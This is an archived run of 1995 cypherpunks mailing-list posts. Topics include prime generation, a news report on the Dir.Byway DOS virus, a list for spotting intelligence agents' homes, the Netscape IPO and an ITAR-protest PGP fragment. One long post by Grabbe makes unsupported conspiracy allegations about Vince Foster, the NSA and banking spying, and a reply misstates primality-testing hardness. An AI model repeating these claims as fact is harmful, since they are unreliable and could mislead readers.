Date: Tue, 8 Aug 95 19:44:09 PDT
To: cypherpunks@toad.com
Subject: Re: Once Upon a Midnight Dreary
In-Reply-To: <9508090001.AA15622@anon.penet.fi>
Message-ID: <199508090244.WAA11572@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



scythe writes:
> A poem based on E.A.Poe's The Raven.
> Abort, Retry, Ignore?
> By Anonymous

I see that you didn't succeed in learning much in the third grade
about reading. The letters "c y p h e r p u n k s" do not spell
"rec.humor.funny".

I would suggest "Hooked on Phonics" or some similar remedial reading
course.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 8 Aug 95 20:13:54 PDT
To: cypherpunks@toad.com
Subject: RE: alt.politics.org.cia
Message-ID: <199508090311.XAA05211@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Pat Farrell <pfarrell@netcom.com> wrote:

<snip>

>But this raises a question (please, not to start a f-war)
>as to what is a "spook"?

<snip>

>Are contractors such as Mitre, E-Systems, and TRW, who do mega-dollars
>of work each year considered spooks? I think some are, as they are
>effectively out-sourced civil servants.

I think the spook-test, to be fair, needs to be based on something
objective, like equipment carried or used. Guns are an easy "yes,"
as are certain listening devices, etc. Others can probably add to
this equipment list, and some of us, considering Mena, might include
drugs or large chunks of cash. I certainly would. <g>

>I guess I could simply walk into the Soviet Embassy and ask them
>where the US spooks are. It isn't a secret from anyone but uninformed
>citizens.

Amen. CIA office locations are much less "secret" in other countries
than they are in the US. Often, a taxi driver knows exactly where the
CIA "safehouses" are in many Latin-American countries.

<snip>

>Is there an ethical question buried here? Making it easy for another nut to
>kill mere working stiffs by posting the locations?

Yes, but these locations are no-doubt easy for motivated nuts to find.
"Military secrets are the most fleeting kind." [Spock on "Star Trek"]

>Disclaimer:  I'm kinda split on this, I've been on this list a long time,
>but my dad, wife, and brother work or worked in town for the government.
>I hope that Tim's revolution is quite and peaceful.

AGREED!
If it's not, it will fail. "War is the health of the state." [I forget
who said that.] Contra the many raving media accounts, the vast majority 
in the libertarian/"anarchist" movement were and are quite opposed to
the idea of vigilante-murder through bombing Federal buildings full
of mere working stiffs, especially those of us who just happened to
be working in a Federal Building. 
[I was. It wasn't any fun that day...] :-(
JMR
<snip>


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCgiSW1lp8bpvW01AQHSVQQAn6fdXfLMlCA9RLNJpr9N3CqrwmdEmTXZ
95yAdIHiOwkzjg7pvTcBIuifnLV0pdDHO0f+BXHiw2BW06ED8rK+nJIZm0OmVsIL
FVnaWCGEVDc9SrSYByrwy5s5nM/g30L8wRQeo7yAKg/0w5zUR4WOaQrKcnLBDaPO
4P42ckNkg8k=
=3+HE
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCgnTyoZzwIn1bdtAQGjOAGA25mHQfQvxsgc8TR+34tGK1BAUB4egwJR
N3tNre54vJT2QkxQ/l0rMlPblYbcIbWE
=Sm3E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Tue, 8 Aug 95 21:24:03 PDT
To: cypherpunks@toad.com
Subject: RE: alt.politics.org.cia
Message-ID: <199508090428.XAA06937@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>In message Tue, 8 Aug 95 14:25:20 EDT, Carl Ellison <cme@TIS.COM>  writes:
>> project for finding unmarked spook buildings in your neighborhood and
>> gathering a database (on the web?) of such.

Well, I've got some Web space still free.... :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 8 Aug 95 23:56:05 PDT
To: cypherpunks@toad.com
Subject: Dir.Byway Virus (NewsClip)
Message-ID: <199508090639.XAA16760@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this legit?

----------

New Computer Virus Attacks "Everything"


Burlington, Mass. Aug. 7 -- A new, hazardous computer virus is
spreading, that takes control of disk operations from
Microsoft MS-DOS or IBM PC-DOS based systems, the anti-virus
research team at S&S Software International is reporting. The
virus, dubbed "Dir.Byway," is described as a super-fast,
polymorphic infector affecting desktops, notebooks, and even 
computer networks.

Pat Bitton, S&S Software vice president of marketing, told
Newsbytes the virus is a very "dangerous" one. Because it is
polymorphic, it mutates with each attack, making it extremely
hard to diagnose and kill. The virus operates as if it is a
TSR (terminate and stay resident) program, infecting .COM and
.EXE files when the home directory of an executable file is
accessed, officials said.

Infections are not confined to the default home directory
either, but infects all executables in all directories of a
search path. In addition, the access does not need to launch
an application. Any kind of access triggers the virus, like
looking at a simple directory listing.

This ability to infect everything in its path makes Dir.Byway
a "super-fast" infector, officials added.

The virus creates a file called "CHKLIST . MS" (without
quotes, but with spaces surrounding the period) in the root
directory, and cross links all infected executable files,
David Emm, customer service manager, told Newsbytes. This then
replaces the normal DOS directory entries, making "CHKLIST .
MS" the start-cluster for every infected file.

If the user deletes the file, it reappears when any infected
file is executed. Also, if the user boots from a clean DOS
disk and runs "CHKDSK," the computer will report a large
number of cross-linked files. If the user boots from the
infected hard drive, the computer will report no errors. A
listing of the root directory using the command "dir/ahs"
(without quotes) will show the "CHKLIST . MS" file.

Dir.Byway triggers if the current DOS date is set to the year
1996 or above, and the day of the month is equal to the
month's number multiplied by two and two is added, like in
01-14-96 or 12-26-96. When triggered, the virus displays a
string of text every three hours, on hours that are a multiple
of three in military time -- for example, 09:00, 12:00, and
18:00. The text says: "Trabajeoms Todos Por Venezuela." S&S
officials said this translates to "We are all working for
Venezuela." On multimedia systems, this is accompanied by a
song that resembles the country's national anthem.

Emm said he is more worried about the spread of the virus for
now than the triggering of it, because it is so dangerous. He
told Newsbytes the virus has been detected in the United
Kingdom and the United States.

Bitton said the company's "Dr. Solomon's Anti-Virus Toolkit"
will remove the virus from infected computers. New versions of
the Toolkit for DOS, Windows, OS/2, and NetWare are slated to
ship in late summer. S&S also plans Fall 1995 introductions of
Toolkits for Macintosh, SCO Unix, Windows 95, and Windows NT
server and workstations.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 8 Aug 95 21:40:35 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Prime Number Gen's.
In-Reply-To: <15295.9508081711@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.3.89.9508082313.C4312-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 8 Aug 1995 aba@atlas.ex.ac.uk wrote:

> 
> "Rev. Ben" <samman@cs.yale.edu> writes on cpunks:
> > Does anyone know of where I could get source, royalty free, in the US for 
> > a good Prime Number Generator?
> 
> GNU code sounds like it would fit the royalty free bill.
> 
> Try the GNU multi-precision library: gmp-1.3.2.tar.gz from all good
> GNU sources.  I get my stuff from ftp://src.doc.ic.ac.uk/gnu/ if you
> don't have a GNU ftp site to hand.
> 
> There's a function
> 
> 	int mpz_probab_prime_p(mpnum, SURETY)
> 
> which returns true if the prime passes SURETY probablistic prime tests.
> 
> I think if it passes say 25 tests, then there will be less than a
> 1/2^25 chance that it is not prime.
> 
> Also, on:
> 
> 	http://dcs.ex.ac.uk/~aba/rsa-keygen.html
> 

The proper thing to do is to then search for a number which demonstrates 
p is prime....

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an224850@anon.penet.fi (scythe)
Date: Tue, 8 Aug 95 17:18:40 PDT
To: cypherpunks@toad.com
Subject: Once Upon a Midnight Dreary
Message-ID: <9508090001.AA15622@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




A poem based on E.A.Poe's The Raven.
Abort, Retry, Ignore?
By Anonymous

Once upon a midnight dreary, fingers cramped and vision bleary,
System manuals piled high and wasted paper on the floor,
Longing for the warmth of bed sheets, still I sat there doing spreadsheets.
Having reached the bottom line I took a floppy from the drawer
I then invoked the SAVE command and waited for the disk to store,
Only this and nothing more.

Deep into the monitor peering, long I sat there wond'ring, fearing.
Doubting, while the disk kept churning, turning yet to churn some more.
But the silence was unbroken, and the stillness gave no token.
"Save!" I said, "You cursed mother! Save my data from before!"
One thing did the phosphors answer, only this and nothing more,
Just, "Abort, Retry, Ignore?"

Was this some occult illusion, some maniacal intrusion?
These were choices undesired, ones I'd never faced before.
Carefully I weighed the choices as the disk made impish noises.
The cursor flashed, insistent, waiting, baiting me to type some more.
Clearly I must press a key, choosing one and nothing more, 
>From "Abort, Retry, Ignore?"

With fingers pale and trembling, slowly toward the keyboard bending,
Longing for a happy ending, hoping all would be restored,
Praying for some guarantee, timidly, I pressed a key.
But on the screen there still persisted words appearing as before.
Ghastly grim they blinked and taunted, haunted, as my patience wore,
Saying "Abort, Retry, Ignore?"

I tried to catch the chips off guard, and pressed again, but twice as hard.
I pleaded with the cursed machine: I begged and cried and then I swore.
Now in mighty desperation, trying random combinations,
Still there came the incantation, just as senseless as before.
Cursor blinking, angrily winking, blinking nonsense as before.
Reading, "Abort, Retry, Ignore?"

There I sat, distraught, exhausted, by my own machine accosted.
Getting up I turned away and paced across the office floor.
And then I saw a dreadful sight: a lightning bolt cut through the night.
A gasp of horror overtook me, shook me to my very core.
The lightning zapped my previous data, lost and gone forevermore.
Not even, "Abort, Retry, Ignore?"

To this day I do not know the place to which lost data go.
What demonic nether world is wrought where lost data will be stored,
Beyond the reach of mortal souls, beyond the ether, into black holes?
But sure as there's C, Pascal, Lotus, Ashton-Tate and more,
You will be one day be left to wander, lost on some Plutonian shore,
Pleading, "Abort, Retry, Ignore?"



----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Tue, 8 Aug 95 22:45:57 PDT
To: cypherpunks@toad.com
Subject: How To Spot a Spook page
Message-ID: <199508090550.AAA07775@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


As a start on a Web page, here are some things I thought of. What else? What
are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
DGI, MI5(?), ???)

1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).
2> No, or *very* few, visitors (esp. kids)
3> Visitors are seldom the same, or almost always the same.
4> Doesn't talk about job/company.
5> Activity at 'unusual' times.
6> Not very 'sociable' (keep to themselves).

Or, tell me to forget it, it doesn't belong here.... :-/

Dave
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KALLISTE@delphi.com
Date: Tue, 8 Aug 95 22:00:10 PDT
To: cypherpunks@toad.com
Subject: Only 1/3 of Government Computers Down So Far
Message-ID: <01HTUMY1W4UA91Y3J0@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	   Allegations Regarding Vince Foster, the NSA, and
		Banking Transactions Spying, Part XV

			  by J. Orlin Grabbe

	The world of money laundering is a difficult one.  What are you 
going to do when your wire transfers to the Caribbean and other offshore 
centers won't go through?  What are you going to do when one-third (as of
August 8, 1995) of certain government computers are down with a virus?  Or 
is it a worm?  Or an octopus?  

	Did the NSA, in its zeal to modify the PROMIS software to spy on 
banking and other transactions, create a massive security hole in computer
systems sending wire transfers?   

	Well, I do hear it is a nice time to go vacationing in the islands, 
even for day trips!  Perhaps FinCEN could relocate to Havana?

	[Note to Julie Franklin:  Over here in Reno, we're always last to
get the news.  Well, I'm a taxpayer.  *Please* put me on your list. In the 
future please fax all computer disconnect info to 702-829-0852.  Thanks.]

	Which brings us to the subject of Ed Meese.  At the end of Reagan's
second term as governor of California, Meese needed a new job. He worked at 
Rohr Industries for a while.  But it didn't suit him, so *Richard Mellon 
Scaife* set up the San Diego Center for Criminal Justice on condition that 
Ed Meese be its Director, a post Meese held 1977-1980.   

	Later, after Ed Meese became Attorney General of the U.S. and the
the people-tracking PROMIS software was stolen by the U.S. Justice 
Department using (according to a federal bankruptcy judge) "trickery, deceit, 
and fraud", Ed Meese's friend Earl Brian--then owner of Financial News 
Network, UPI, and Hadron corporation--proceeded to market the software all 
over the world, as well as to U.S. intelligence and law enforcement agencies.

	One agency that acquired the software was FEMA, the Federal  
Emergency Management Agency, which proceeded to create a data base of
political dissidents to be rounded up in event of a national emergency.
(Like any information, once collected it found multiple uses.) This data 
base was called MAINCORE, and the FEMA MAINCORE system was operated out of 
the basement of a building in Culpeper, VA.  

	Journalist Danny Casolaro, with the help of Alan Standorf, was able 
to get printouts of this totalitarian application of the PROMIS software 
just prior to his demise.  (When a member of congress attempted to question 
Oliver North about the FEMA MAINCORE data base, he was rudely shouted down 
by the chairman of the investigative committee.)

	Another agency that put the software to use was the Wackenhut
Corporation. It used the enhanced PROMIS to keep track of critics of the 
nuclear industry, an area in which *Richard Mellon Scaife* has a vested 
financial interest.

	Now Mellon bank in Pittsburgh finds itself embroiled in very
serious money laundering charges.

	Do these facts explain why the Little-Rock connection to the 
theft and modification of the PROMIS software for the purpose of spying
on banking transactions is a subject carefully avoided in Scaife-sponsored 
political advertisements?  

	Is this why the Mena-drug-smuggling, Little-Rock-money-laundering
operation allegedly stops with Bill Clinton?  
		    
	Is this why the connection of Vince Foster both to bank spying and 
nuclear espionage has been carefully downplayed?  

	Do Scaife's investments in the "terrorism industry" have anything 
to do with recent media hyping of the imminent threat to the U.S. of 
"international" terrorism?  

	Scaife's exposing of the sins of the Democrats has certainly 
served a useful purpose.  But don't think the story stops with Bill
Clinton.

	Perhaps the reason that Mr. Kenneth Starr's independent 
investigation into the Whitewater affair has gone so slowly is that 
Mr. Starr, in order to nail Bill Clinton, has to also nail a number 
of high-ranking Republicans?  

	Well, Mr. Starr, let the facts fall where they may.  I have 
confidence in you.  You do want to be Attorney General someday, don't 
you?  If you can find your way to do the right thing, you'll certainly 
deserve the position.

	Otherwise the wily hackers of the world may have to do your job
for you. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMChlMWX1Kn9BepeVAQHbhgP/bSlSNnUClp4HPEDiB22JGHrqvMa5B6h8
LW0rR7eZdD2ub9CUj/HBfIrnU4mekw6MfmExxuy+mva1Z5MPsZKuE1qvxWBFHK5S
TzMFsPBsZNPH2GEDIQHZp/rIQeKYDsfjOp1OLVUPD9MA4tlTOQPgQ5RVzzKi+tEF
K1+Uxvy1lQ4=
=5pPJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 8 Aug 95 23:12:29 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: How To Spot a Spook page
In-Reply-To: <199508090550.AAA07775@arnet.arn.net>
Message-ID: <Pine.ULT.3.91.950809011155.19520D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 9 Aug 1995, David K. Merriman wrote:

> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).
> 2> No, or *very* few, visitors (esp. kids)
> 3> Visitors are seldom the same, or almost always the same.
> 4> Doesn't talk about job/company.
> 5> Activity at 'unusual' times.
> 6> Not very 'sociable' (keep to themselves).

Uh, if you look at that, that is EXACTLY identical to the majority of 
computer geeks :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCg1tTokqlyVGmCFAQEjZwP/e28pd4BOGmKy+Tpl1w1S17liHpAIqXc2
6FW5qE8qz5o362UPOMdeWSojbghxTlcIPN/pGNKgKIaULo7bxIe/y6fMwCtPAVCa
HTxpOgZNqLqh77mqxNDYCJKHsaloA5VN2zQZoktLj4HcK/H9aqR/siI9fx6c1aDv
u8r/q2WttuY=
=DqzK
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Wed, 9 Aug 95 01:02:01 PDT
To: cypherpunks@toad.com
Subject: Re: How To Spot a Spook page
Message-ID: <199508090807.DAA29133@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Uh, if you look at that, that is EXACTLY identical to the majority of 
>computer geeks :-)
>

er, ah, um......

Well, then I guess we need more identifiers then, don't we?

Dave

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMChKgsVrTvyYOzAZAQH8uAP+MRbza+ttgJCOqXlgtfwI1vTcYjAWzAm0
8EK5L/83iXhYhGuZIR44YqGdwGGkSeC0lqaZDaYqQFH8W/SMcPJYyOPbAzEv/5a4
uYNW8qx/YcLwUPsr/4K6Vwd+yg4Es/sT3cxzwZdbKL8sRInN6dv32Y89pIf/FURy
mietqXnCwOY=
=Hijl
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 08:36:35 PDT
To: cypherpunks@toad.com
Subject: Re: Prime Number Gen's.
Message-ID: <199508091535.IAA28827@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There are algorithms for producing provable primes which don't take
too long.  However they do not work to prove a given probable prime
is actually prime, rather they generate a prime.  One was described
by Mihailescu Preda, <zhmhd@zh014.ubs.ubs.ch>, on sci.crypt on
December 13, 1993.  It is not clear whether this kind of algorithm is
suitable for RSA (where the primes must be kept secret) since it could
reduce the space of primes which are produced.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 9 Aug 95 05:37:43 PDT
To: cypherpunks@toad.com
Subject: Re: Dir.Byway Virus (NewsClip)
Message-ID: <199508091237.IAA14167@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




>    Subject: Dir.Byway Virus (NewsClip)
>    From: anonymous-remailer@shell.portal.com (unknown)
>    To: cypherpunks@toad.com
         ^^^^^^^^^^^^^^^^^^^^ You misspelled VIRUS-L@lehigh.edu
    
>    Burlington, Mass. Aug. 7 -- A new, hazardous computer virus is

A news story, with all *that* entails.

>    virus, dubbed "Dir.Byway," is described as a super-fast,
>    polymorphic infector affecting desktops, notebooks, and even 
>    computer networks.

So it's a polymorphic fast infector that attacks EXE and COM files.
So what's new?  File infectors are never as successful as boot sector
infectors, anyhow.

>    Dir.Byway triggers if the current DOS date is set to the year
>    1996 or above, and the day of the month is equal to the
>    month's number multiplied by two and two is added, like in
>    01-14-96 or 12-26-96.

The first date should obviously be 01-04-96, based on the description
given.  Do you trust someone who can't multiply and add to correctly
report on something technical, like computer viruses?

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 06:53:07 PDT
To: KALLISTE@delphi.com
Subject: Re: Only 1/3 of Government Computers Down So Far
In-Reply-To: <01HTUMY1W4UA91Y3J0@delphi.com>
Message-ID: <199508091351.JAA12331@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Was the message that this isn't "FosterPunks" unclear the first
seventy times?

KALLISTE@delphi.com writes:
> 	   Allegations Regarding Vince Foster, the NSA, and
> 		Banking Transactions Spying, Part XV
> 
> 			  by J. Orlin Grabbe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 9 Aug 95 07:14:32 PDT
To: nzook@bga.com (Nathan Zook)
Subject: Re: Prime Number Gen's.
In-Reply-To: <Pine.3.89.9508082313.C4312-0100000@lia.bga.com>
Message-ID: <199508091413.KAA00112@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:
> > don't have a GNU ftp site to hand.
> > 
> > There's a function
> > 
> > 	int mpz_probab_prime_p(mpnum, SURETY)
> > 
> > which returns true if the prime passes SURETY probablistic prime tests.
> > 
> > I think if it passes say 25 tests, then there will be less than a
> > 1/2^25 chance that it is not prime.
> > 
> > Also, on:
> > 
> > 	http://dcs.ex.ac.uk/~aba/rsa-keygen.html
> > 
> 
> The proper thing to do is to then search for a number which demonstrates 
> p is prime....

  And how do you do this? I'm not aware of any deterministic primality
test which isn't atleast as hard as factoring. P-1 factorial is such
a number which could demonstrate P is prime (compute the gcd, check if
they are relatively prime). Good luck computing it.
 
-Ray







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Aug 95 11:13:42 PDT
To: cypherpunks@toad.com
Subject: Crypto = Competitive Advantage?
Message-ID: <199508091417.KAA17510@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Note to Mr. Bill -

I was watching CNBC this morning while reading my mail and they had a story
on the Netscape Communications IPO (ticker NSCP btw).  Some analyst said
when asked whether Microsoft couldn't just wipe them out that the most
important part of Netscape's product was that it offered end-to-end
encryption.  He said that this was important for the growth of the nets and
was something that people wanted.

DCF

"Competitive Advantage - Markets vs Politics - in a market your customers go
out of their way to give you their money, in politics the 'customers' go out
of their way to keep from giving you their money."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 9 Aug 95 08:05:20 PDT
To: cypherpunks@toad.com
Subject: Re: How To Spot a Spook page
Message-ID: <9508091505.AA23842@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> As a start on a Web page, here are some things I thought of. What else? What
> are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
> DGI, MI5(?), ???)

> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).
> 2> No, or *very* few, visitors (esp. kids)
> 3> Visitors are seldom the same, or almost always the same.
> 4> Doesn't talk about job/company.
> 5> Activity at 'unusual' times.
> 6> Not very 'sociable' (keep to themselves).

Isn't this a troll? It looks like the old National Inquirer 'How to tell if 
your neighbor is a space alien' list.

Peter Trei
ptrei@acm.org)
(Claimer: I'm a former MITRE employee)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 9 Aug 95 12:00:59 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto = Competitive Advantage?
Message-ID: <ac4e530c13021004688c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM 8/9/95, Duncan Frissell wrote:
>Note to Mr. Bill -
>
>I was watching CNBC this morning while reading my mail and they had a story
>on the Netscape Communications IPO (ticker NSCP btw).  Some analyst said
>when asked whether Microsoft couldn't just wipe them out that the most
>important part of Netscape's product was that it offered end-to-end
>encryption.  He said that this was important for the growth of the nets and
>was something that people wanted.

As long as the Netscape IPO topic has come up...

A former member of our list, Marc Andreessen, just became worth $70 million
or so in today's IPO. (IPO = Initial Public Offering, or "Internet PGP
Offering")

Personally, I think this valuation of Netscape at a few billion dollars is
way too high. They've got a leading product, which most folks have gotten
for free, and they've signed a bunch of corporate deals. But a few billion
for a brand new company?

...and who knows how many of their sudden multimillionaire developers will
now leave...?

Crypto could be the next big wave of IPOs, with "Verisign" and "RSADSI"
both rumored to be offered. Some of the digital commerce companies may be
next.

It seems that anything involving the Internet, the Web, and digital
commerce is really, really hot.

--Timothy C. May, President, Bank of the Web


Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Wed, 9 Aug 95 11:21:49 PDT
To: Kelly Goen <kelly@netcom.com>
Subject: Re: Over 350 'Munitions T-shirts' Shipped
Message-ID: <199508091830.MAA02588@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Where are mine...I got the money to you via
>Mario wojo???? at SUN...
>I ordered 8 of the shirts

Sorry. I show no order for anyone named Goen, no orders from anyone named Mario, and only one order from anyone at Sun. Are you sure you ordered from me or did you order from Joel? (Who I understand has been a bit slow in filling his orders.) If you want to order from me, I have included email and USnail ordering instructions at the end of this message.

>BTW
>I am the publisher of PGP 1.0 the only person
>who will be indicted with Phil or alone for PGP
>what about MY defense fund????

I'm not in the business of setting up defense funds. If you have one, I would be happy to publicize it. Send me your story.

-----BEGIN PGP SIGNED MESSAGE-----

MUNITIONS TSHIRT ORDER INFO (That you requested)

Either cost only (UK), or 25% proceeds to Phil Zimmermann (US).

We now have 2 suppliers, one in the US (WEPIN, for US & Canadians only), 
and one in the UK (Adam Back) for the 'free world', you know places like 
Europe (with the strange exception of France), Australia, New Zealand, 
Singapore, Japan, etc, etc.

If you are a citizen of and living in the US or Canada:
===========================================================================
 US orders (25% of proceeds to the Phil Zimmermann legal defense fund):

        http://colossus.net/wepinsto/

(It's all set up for WWW forms, you can use VISA, M/C, or personal check
to buy on-line, or you can order via PGP-encrypted email.)

Tshirts are black 100% cotton Beefy-T with white printing. On the front
of the shirt are the words 'RSA encryption in perl'. Below that is a perl
script that implements the RSA algorithm for arbitrary keylengths. Below
that is a machine-readable barcode of the same perl script. On the back
of the shirt are the words 'WARNING This t-shirt is a munition' along with
the ITAR and USC references that make it a munition that is illegal to
export. You can see a mockup of the design by pointing your Web browser
to the URL http://colossus.net/wepinsto/wsft_f/wspp_f/tshirt1.html.

Here's the prices, but order through the web page if you can, all on-line, 
Tshirts only (no sweatshirts), and only in black:

